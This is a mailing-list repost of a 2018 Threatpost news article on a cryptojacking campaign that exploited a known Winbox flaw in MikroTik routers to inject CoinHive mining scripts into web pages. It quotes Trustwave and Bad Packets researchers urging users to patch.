[BreachExchange] Huge Cryptomining Attack on ISP-Grade Routers Spreads Globally

[Inga Goddijn]

https://threatpost.com/huge-cryptomining-attack-on-isp-grade-routers-spreads-globally/134667/

A massive hacking campaign has been uncovered, compromising tens of
thousands of MikroTik routers to embed Coinhive scripts in websites using a
known vulnerability.

So far, Censys.io has reported
<https://twitter.com/bad_packets/status/1024868429797322753> more than
170,000 active MikroTik devices infected with the CoinHive site-key used in
this campaign (the site-key is the same across infections, indicating a
single entity behind the attacks). The campaign is mainly targeting Brazil
– but infections are growing internationally, according to Trustwave’s
Secure Web Gateway (SWG) team, indicating much larger ambitions.

“This is a warning call and reminder to everyone who has a MikroTik device
to patch as soon as possible,” Trustwave researcher Simon Kenin wrote a
posting
<https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/>
 today. “This attack may currently be prevalent in Brazil, but during the
final stages of writing this blog, I also noticed other geo-locations being
affected as well, so I believe this attack is intended to be on a global
scale.”

MikroTik routers are used in large enterprises and by ISPs to serve web
pages to thousands or more users daily, meaning that each compromise
translates into a big payday for the threat actor.

“We’re … talking about potentially millions of daily pages for the
attacker,” Kenin wrote. “The attacker wisely thought that instead of
infecting small sites with few visitors, or finding sophisticated ways to
run malware on end-user computers, they would go straight to the source:
carrier-grade router devices.”

Kenin added that while cryptomining is the primary goal of this wave of
attacks, the script has persistence and the flexibility to change and add
new features, exacerbating the threat.
A Known Vulnerability

The attacks demonstrate the dangers of neglecting to patch. The campaign is
taking advantage of a known vulnerability in the routers, which was patched
by MikroTik <https://forum.mikrotik.com/viewtopic.php?f=21&t=133533> on
April 23rd. A tweet
<https://twitter.com/MalwareHunterBR/status/1023893755974352896>from
@MalwareHunterBR revealed the exploit being used, which targets Winbox and
allows the attacker to gain unauthenticated remote administrative access to
any vulnerable MikroTik router. A Shodan search shows at least 70,000
affected routers in Brazil alone, and tens of thousands more in other
geographies.

Whoever’s behind the campaign – so far, an unknown entity – also has some
know-how when it comes to this particular router, given that he or she
found a new attack vector for the vulnerability.

“Initial investigation indicates that instead of running a malicious
executable on the router itself, which is how the exploit was being used
when it was first discovered, the attacker used the device’s functionality
in order to inject the CoinHive script into every web page that a user
visited,” explained Kenin.

Further, the researcher uncovered that many of the compromised pages are
actually error pages of the webproxy, meaning that the attacker created a
custom error page with the CoinHive script in it.

“If a user receives an error page of any kind while web browsing, they will
get [a] custom error page which will mine CoinHive for the attacker,” Kenin
explained. “The backend Apache server is connected to the router as well,
and somewhere along the way there was an error and it was displayed to me,
miner included. What this means is that this also impacts users who are not
directly connected to the infected router’s network, but also users who
visit websites behind these infected routers. In other words, the attack
works in both directions.”
A Growing Campaign

The Trustwave research shows that the attacker has built mechanisms into
the attacks that offer future potential for the existing infections.

Meanwhile, among the commands that are executed when a router is infected
is the creation of scheduled tasks for updating if needed. For one, he or
she has scheduled a task which connects to another host and fetches a new
“error.html” file – likely in the event that the site-key was blocked and
had to be replaced with another.

The attacker also scheduled a task which downloads and executes a script
written for MikroTik routers named “u113.rsc”. A backdoor account named
“ftu” is created as well.

“When we checked, the script was just being used as a placeholder, but it’s
clearly a way for the attacker to send additional commands to all
compromised devices at their disposal,” Kenin explained, who added that he
noticed the script being updated a few times during his investigation.
These updates added more cleanup commands to leave a smaller footprint and
reduce the risk of being detected.

“MikroTik users need to ensure their RouterOS is up-to-date with the latest
security patches,” said Troy Mursch
<https://twitter.com/bad_packets/status/1024868429797322753>, security
researcher at Bad Packets Report, via email. “Otherwise, as we see in this
case, they can be compromised to inject cryptojacking malware. As the
Censys and Shodan search results reveal, it’s been easy for miscreants to
compromise them on a large scale.”
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.riskbasedsecurity.com/pipermail/breachexchange/attachments/20180803/27c7114a/attachment.html>